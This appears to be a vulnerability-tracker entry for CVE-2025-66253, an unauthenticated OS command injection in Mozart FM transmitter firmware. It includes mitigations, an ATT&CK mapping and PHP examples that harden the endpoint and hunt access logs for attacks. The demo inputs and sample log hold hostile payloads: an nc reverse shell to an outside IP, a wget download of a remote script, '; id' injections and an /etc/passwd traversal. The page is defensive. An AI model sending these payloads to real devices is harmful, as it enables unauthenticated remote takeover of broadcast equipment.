Cyber Posture

CVE-2025-66253

Critical · Public PoC

Published: 26 November 2025
Modified: 03 December 2025
KEV Added: none recorded
Patch: none recorded
CVSS Score: 9.8 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
EPSS Score: 0.0055 (68.2nd percentile)
Risk Priority: 20 (weighted 60% EPSS · 20% KEV · 20% CVSS)

Description

Unauthenticated OS Command Injection (start_upgrade.php) in DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000 and 7000 allows an unauthenticated attacker to achieve remote code execution via start_upgrade.php, because user input is passed directly to exec(). The `/var/tdf/start_upgrade.php` endpoint passes the user-controlled `$_GET["filename"]` parameter straight into `exec()` without sanitization or shell escaping. An attacker can therefore inject arbitrary shell commands using metacharacters (`;`, `|`, etc.) and obtain remote code execution as the web server user (likely root).

Mitigating Controls (NIST 800-53 r5) [AI-generated]

prevent: Directly requires validation of the user-controlled $_GET["filename"] parameter at the input point, before it is passed to exec(), to block injection of shell metacharacters.
prevent: Restricts the filename input to safe, authorized values that exclude shell metacharacters such as ; or |, preventing OS command injection.
prevent: Mandates timely remediation of the command injection flaw in start_upgrade.php through identification, patching and verification.
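The pattern the description and the controls above refer to, shown beside a hardened form of the same request handler. This is an added example, not the vendor's start_upgrade.php (which is not reproduced on this page): the command shape `sh <script> <filename>`, the helper script path and the upload directory are assumptions. To keep the demo safe to run, both variants return the command line that would reach `exec()` instead of executing it.

```php
<?php
declare(strict_types=1);

// Added example; not the vendor's code. UPGRADE_SCRIPT, the command shape and
// the upload directory are assumptions. Requires PHP 8+.

const UPGRADE_SCRIPT = '/var/tdf/upgrade.sh';   // assumed helper invoked via exec()

// Vulnerable pattern, as the CVE describes it: $_GET["filename"] is spliced
// into the command string unchanged, so "fw_v2.bin; id" makes the shell run `id`.
function build_upgrade_command_vulnerable(array $get): string
{
    $filename = $get['filename'] ?? '';
    return 'sh ' . UPGRADE_SCRIPT . ' ' . $filename;   // original: exec($cmd, $out)
}

// Hardened replacement. Three independent layers, any one of which alone would
// have stopped the payload shapes below:
//   1. allowlist the token (bare firmware name: no slash, no metacharacter, no leading dot);
//   2. confine it to the upload directory via realpath(), which also resolves symlinks;
//   3. quote it with escapeshellarg() before it can reach the shell.
function build_upgrade_command_hardened(array $get, string $uploadDir): string
{
    $filename = $get['filename'] ?? '';
    if (!is_string($filename)
        || !preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]{0,63}\.bin\z/', $filename)) {
        throw new InvalidArgumentException('filename rejected by allowlist');
    }

    $base = realpath($uploadDir);
    $path = realpath($uploadDir . DIRECTORY_SEPARATOR . $filename);
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        throw new RuntimeException('file not present inside the upload directory');
    }

    return 'sh ' . UPGRADE_SCRIPT . ' ' . escapeshellarg($path);
}

// Demo: one legitimate upload beside the payload shapes the advisory mentions.
$uploadDir = sys_get_temp_dir() . '/tdf_upload_demo_' . getmypid();
mkdir($uploadDir, 0700);
touch($uploadDir . '/fw_v2.bin');

$requests = [
    'fw_v2.bin',                                      // legitimate
    'fw_v2.bin; id',                                  // ';' command separator
    'fw_v2.bin | nc 198.51.100.23 4444 -e /bin/sh',   // '|' pipe
    '$(id).bin',                                      // command substitution
    '../../etc/passwd',                               // traversal without metacharacters
    'missing.bin',                                    // passes the allowlist, fails confinement
];

foreach ($requests as $filename) {
    $get = ['filename' => $filename];
    printf("input : %s\n", $filename);
    printf("  vuln: %s\n", build_upgrade_command_vulnerable($get));
    try {
        printf("  hard: %s\n", build_upgrade_command_hardened($get, $uploadDir));
    } catch (Throwable $e) {
        printf("  hard: REJECTED (%s)\n", $e->getMessage());
    }
}

unlink($uploadDir . '/fw_v2.bin');
rmdir($uploadDir);
```

Note that `escapeshellarg()` on its own would already neutralise `;`, `|` and `$(...)`, but it would happily quote `../../etc/passwd`; the allowlist and the `realpath()` confinement are what stop the filename from naming anything outside the upload directory, which is why the hardened builder keeps all three checks rather than relying on quoting alone.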

Security Summary [AI-generated]

CVE-2025-66253 is an unauthenticated OS command injection vulnerability in the start_upgrade.php script of DB Electronica Telecomunicazioni S.p.A. Mozart FM Transmitter devices, affecting versions 30, 50, 100, 300, 500, 1000, 2000, 3000, 3500, 6000 and 7000. The issue stems from the /var/tdf/start_upgrade.php endpoint, which passes the user-controlled $_GET["filename"] parameter directly into PHP's exec() function without sanitization or shell escaping, so an attacker can inject arbitrary commands.

An unauthenticated attacker with network access exploits the flaw by sending a crafted GET request to the start_upgrade.php endpoint with shell metacharacters such as ; or | in the filename parameter. Successful exploitation yields remote code execution as the web server user (likely root), with high confidentiality, integrity and availability impact. The vulnerability carries a CVSS v3.1 base score of 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H) and maps to CWE-78 (OS Command Injection).

The researcher's vulnerability analysis is referenced at https://www.abdulmhsblog.com/posts/webfmvulns/. The CVE record published on 2025-11-26 lists no vendor advisory or specific patch information.

Details

CWE(s)

CWE-78 OS Command Injection

Affected Products

dbbroadcast mozart next 30 firmware (all versions)
dbbroadcast mozart next 50 firmware (all versions)
dbbroadcast mozart next 100 firmware (all versions)
dbbroadcast mozart next 300 firmware (all versions)
dbbroadcast mozart next 500 firmware (all versions)
dbbroadcast mozart next 1000 firmware (all versions)
dbbroadcast mozart next 2000 firmware (all versions)
dbbroadcast mozart next 3000 firmware (all versions)
dbbroadcast mozart next 3500 firmware (all versions)
dbbroadcast mozart next 6000 firmware (all versions)
+12 more product configuration(s) — see NVD for full list

MITRE ATT&CK Enterprise Techniques [AI-generated]

T1190 Exploit Public-Facing Application (Initial Access)
Adversaries may attempt to exploit a weakness in an Internet-facing host or system to initially access a network.
T1059.004 Unix Shell (Execution)
Adversaries may abuse Unix shell commands and scripts for execution.
Why these techniques?

Unauthenticated OS command injection in a public-facing web endpoint (/var/tdf/start_upgrade.php) directly enables exploitation of public-facing applications (T1190) and execution of arbitrary Unix shell commands via PHP exec() (T1059.004).

Confidence: HIGH · MITRE ATT&CK Enterprise v19.0
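A hunt over web server access logs for the request shape described in the Security Summary and mapped to T1190 above. This is an added example, not part of the advisory, the researcher's analysis or any vendor tooling. Assumptions: the web server writes Common/Combined Log Format, and the endpoint is reachable at some path ending in `start_upgrade.php` (the URL prefix on the device is not documented on this page, so only the basename is matched). The log lines are constructed for the demo.

```php
<?php
declare(strict_types=1);

// Added example, not from the advisory or the vendor. Log format and URL
// basename matching are assumptions; sample lines are constructed. PHP 8+.

// client, timestamp, method, target, status
const ACCESS_LINE_RE = '/^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})/';

// Anything that lets the value break out of a single shell word.
const SHELL_META_RE = '/[;|&`$(){}<>\n\r]/';

function parse_access_line(string $line): ?array
{
    if (!preg_match(ACCESS_LINE_RE, $line, $m)) {
        return null;
    }
    return ['client' => $m[1], 'time' => $m[2], 'method' => $m[3],
            'target' => $m[4], 'status' => (int) $m[5]];
}

function classify_request(array $req): ?array
{
    $path = parse_url($req['target'], PHP_URL_PATH);
    if (!is_string($path) || basename($path) !== 'start_upgrade.php') {
        return null;                        // not the vulnerable endpoint
    }

    $filename = null;
    $query = parse_url($req['target'], PHP_URL_QUERY);
    if (is_string($query)) {
        parse_str($query, $params);         // percent-decodes once
        $filename = $params['filename'] ?? null;
    }

    $reasons = [];
    if (is_string($filename)) {
        // Check the decoded value and one further decoding pass, so a
        // double-encoded ';' ("%253B") is caught as well.
        foreach ([$filename, rawurldecode($filename)] as $candidate) {
            if (preg_match(SHELL_META_RE, $candidate)) {
                $reasons['shell metacharacters in filename'] = true;
            }
            if (str_contains($candidate, '/') || str_contains($candidate, '..')) {
                $reasons['path component in filename'] = true;
            }
        }
    }

    return [
        'client'   => $req['client'],
        'time'     => $req['time'],
        'status'   => $req['status'],
        'filename' => $filename,
        // Every hit on the endpoint is unauthenticated and worth recording;
        // metacharacters make it an attempt, and a 2xx on an attempt means
        // the injected command most likely ran.
        'verdict'  => $reasons
            ? ($req['status'] < 300 ? 'exploit attempt, likely succeeded' : 'exploit attempt')
            : 'endpoint reached',
        'reasons'  => array_keys($reasons),
    ];
}

function hunt(array $lines): array
{
    $findings = [];
    foreach ($lines as $line) {
        $req = parse_access_line($line);
        if ($req === null) continue;
        $finding = classify_request($req);
        if ($finding !== null) $findings[] = $finding;
    }
    return $findings;
}

// Constructed sample: one legitimate upgrade, three payload shapes, one unrelated request.
$sampleLog = [
    '203.0.113.7 - - [27/Nov/2025:10:14:02 +0000] "GET /start_upgrade.php?filename=fw_v2.bin HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [27/Nov/2025:10:14:09 +0000] "GET /start_upgrade.php?filename=x%3Bid HTTP/1.1" 200 88 "-" "curl/8.4.0"',
    '198.51.100.23 - - [27/Nov/2025:10:15:31 +0000] "GET /start_upgrade.php?filename=x%7Cwget%20http%3A%2F%2F198.51.100.23%2Fa.sh%20-O%20%2Ftmp%2Fa.sh HTTP/1.1" 200 0 "-" "python-requests/2.32"',
    '198.51.100.23 - - [27/Nov/2025:10:15:40 +0000] "GET /index.php HTTP/1.1" 200 3042 "-" "python-requests/2.32"',
    '203.0.113.7 - - [27/Nov/2025:10:16:00 +0000] "GET /start_upgrade.php?filename=x%253Bid HTTP/1.1" 500 0 "-" "curl/8.4.0"',
];

foreach (hunt($sampleLog) as $f) {
    printf("%-14s %s  %d  %-22s %s%s\n", $f['client'], $f['time'], $f['status'],
        var_export($f['filename'], true), $f['verdict'],
        $f['reasons'] ? ' [' . implode('; ', $f['reasons']) . ']' : '');
}
```

Because the endpoint needs no authentication, the first finding (a clean `fw_v2.bin`) is still reported as "endpoint reached": on a device that should only be upgraded from a management network, any external client touching start_upgrade.php is itself worth a look, not only the requests carrying metacharacters.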
